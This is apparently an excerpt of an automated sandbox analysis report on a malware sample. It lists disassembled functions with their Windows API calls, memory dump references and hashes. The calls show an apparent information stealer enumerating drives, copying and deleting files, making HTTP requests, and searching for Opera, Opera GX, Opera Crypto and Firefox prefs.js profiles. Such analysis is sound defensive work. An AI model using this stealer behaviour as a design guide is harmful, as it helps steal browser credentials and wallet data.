                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 008E6A7C
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 008E6A88
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 008E6A94
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                                                                                                                                                                                                                    • String ID: ERROR$ERROR$GET
                                                                                                                                                                                                                                                                                                                    • API String ID: 3863758870-2509457195
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 2a0136bf7ab021527f1c60efb9772d24acdfcfc4b12eac8e69b3a8f6562a898d
                                                                                                                                                                                                                                                                                                                    • Instruction ID: e54d1345b8a5cee05e3cc890cee1f5cba2f288ba2cf403ec1a00d4c56304b87b
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a0136bf7ab021527f1c60efb9772d24acdfcfc4b12eac8e69b3a8f6562a898d
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B516C7190016DAFDB20AB65DC85EAEBBB8FB14344F0081A2FA48F3161DE305F959F90
                                                                                                                                                                                                                                                                                                                    Function 008E1D70 Relevance: 23.3, APIs: 12, Strings: 1, Instructions: 529fileCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,0091BBCC,0091BBD0,00917AC2,00917ABF,008F953D,?,00000000), ref: 008E1F94
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0091BBD4), ref: 008E1FC7
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0091BBD8), ref: 008E1FE1
                                                                                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,0091BBDC,0091BBE0,?,0091BBE4,00917AC3), ref: 008E20CD
                                                                                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008E22B3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 008F3A59
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 008E2326
                                                                                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 008E2392
                                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 008E23A6
                                                                                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008E25CC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E9163
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,008EF752,?,?,?), ref: 008E917A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,008EF752,?,?,?), ref: 008E9191
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E91A8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CloseHandle.KERNEL32(?,?,?,?,?,008EF752,?,?,?), ref: 008E91D0
                                                                                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 008E263F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: Sleep.KERNEL32(000003E8,?,?), ref: 008F8C4D
                                                                                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 008E26B6
                                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 008E26CA
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: CreateThread.KERNEL32(00000000,00000000,008F8B15,?,00000000,00000000), ref: 008F8C85
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 008F8C8D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F39EE: GetFileAttributesA.KERNEL32(?,?,?,008EEA72,?,?,?), ref: 008F39F5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F38A6: GetSystemTime.KERNEL32(?,00917807,?), ref: 008F38D5
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                                                                                                                    • API String ID: 1475085387-1173974218
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 94f7ca57eddfd2dded9b005051ac156c0c8c460a762cd990eea418f5d87c42c5
                                                                                                                                                                                                                                                                                                                    • Instruction ID: e358c5a2313abefc506a1352f188218579fd9e847039496ff790cee1cc3fbdcf
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94f7ca57eddfd2dded9b005051ac156c0c8c460a762cd990eea418f5d87c42c5
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7032A331A0016D9BCB21FB29DC46ADDB778FF45304F5105E1AA48B7262DB716F868F82
                                                                                                                                                                                                                                                                                                                    Function 008F7178 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 008F71A5
                                                                                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 008F71BC
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00917AC0), ref: 008F71DD
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00917AC4), ref: 008F71F7
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?), ref: 008F7248
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?), ref: 008F725B
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 008F726F
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 008F7282
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00917AC8), ref: 008F7294
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 008F72A8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E9163
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,008EF752,?,?,?), ref: 008E917A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,008EF752,?,?,?), ref: 008E9191
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E91A8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CloseHandle.KERNEL32(?,?,?,?,?,008EF752,?,?,?), ref: 008E91D0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: CreateThread.KERNEL32(00000000,00000000,008F8B15,?,00000000,00000000), ref: 008F8C85
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 008F8C8D
                                                                                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 008F735E
                                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 008F7372
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                                                                                                                                                                                                                    • String ID: %s\%s
                                                                                                                                                                                                                                                                                                                    • API String ID: 1150833511-4073750446
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 83cd75cb27e30cf47e2d73e3ade70b17d4066bb76a9c5aa0f1bcc67b625c2cbb
                                                                                                                                                                                                                                                                                                                    • Instruction ID: b6226fe61018dd881f94ab70a41ba097334ab293473a365203b5a3587d25a2cb
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83cd75cb27e30cf47e2d73e3ade70b17d4066bb76a9c5aa0f1bcc67b625c2cbb
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B65129B590021DABCF60DB64DC89AD9B7BCFB49311F0004E5AB08E3210EB319B96CF65
                                                                                                                                                                                                                                                                                                                    Function 008ECE96 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,\*.*,009178EE,008EDC21,?,?), ref: 008ECF0E
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00918638), ref: 008ECF2E
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0091863C), ref: 008ECF48
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Opera,0091790D,00917907,00917906,00917903,009178F3,009178F2,009178EF), ref: 008ECFD4
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Opera GX), ref: 008ECFE2
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 008ECFF0
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                                                                                    • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                                                                                                                                                                    • API String ID: 2567437900-1710495004
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 49f950aa73c860e4e749c805124df8f2e1bd8efcb5af29599e6204e1b83efbd0
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3607fde1fe7830855d880cfc7e6647e01c0e90de02f7928be8e72f76e8dff31e
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49f950aa73c860e4e749c805124df8f2e1bd8efcb5af29599e6204e1b83efbd0
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA02B73290016D9BCB60FB3ADD46ADDB774FF45304F4104E1AA08F7252DA716F9A8E82
                                                                                                                                                                                                                                                                                                                    Function 008F6E7F Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 144stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 008F6EFF
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008F6F22
                                                                                                                                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 008F6F2B
                                                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,?), ref: 008F6F4B
                                                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,?), ref: 008F6F65
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F6A05: wsprintfA.USER32 ref: 008F6A59
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F6A05: FindFirstFileA.KERNEL32(?,?), ref: 008F6A70
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F6A05: _memset.LIBCMT ref: 008F6A8C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F6A05: _memset.LIBCMT ref: 008F6A9D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F6A05: StrCmpCA.SHLWAPI(?,00917A38), ref: 008F6ABE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F6A05: StrCmpCA.SHLWAPI(?,00917A3C), ref: 008F6AD8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F6A05: wsprintfA.USER32 ref: 008F6AFF
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F6A05: StrCmpCA.SHLWAPI(?,0091766E), ref: 008F6B13
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F6A05: wsprintfA.USER32 ref: 008F6B3C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F6A05: _memset.LIBCMT ref: 008F6B65
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F6A05: lstrcat.KERNEL32(?,?), ref: 008F6B7A
                                                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 008F6F85
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008F6FFF
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                                                                                                                                                                                                                    • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                                                                                                                                    • API String ID: 441469471-147700698
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ba74447342eff9cf27a2e417a1b5c4ecc2edfa76088fec23ba24803e78412ea6
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 145972abb4eea8324aba7e2042618d7ca1f531f114a6a6d3359c3b44a81622af
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba74447342eff9cf27a2e417a1b5c4ecc2edfa76088fec23ba24803e78412ea6
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 755116B190025CAFDF309FA4CC85AE9BBB8FF05304F1041A5EA48E6111EB325E99CF16
                                                                                                                                                                                                                                                                                                                    Function 008EE5B9 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,00918738,0091796F,?,?,?), ref: 008EE63A
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0091873C), ref: 008EE65B
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00918740), ref: 008EE675
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,prefs.js,00918744,?,0091797D), ref: 008EE701
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F38A6: GetSystemTime.KERNEL32(?,00917807,?), ref: 008F38D5
                                                                                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008EE7DB
                                                                                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 008EE8A6
                                                                                                                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(?,?), ref: 008EE949
                                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 008EE95D
                                                                                                                                                                                                                                                                                                                    Strings
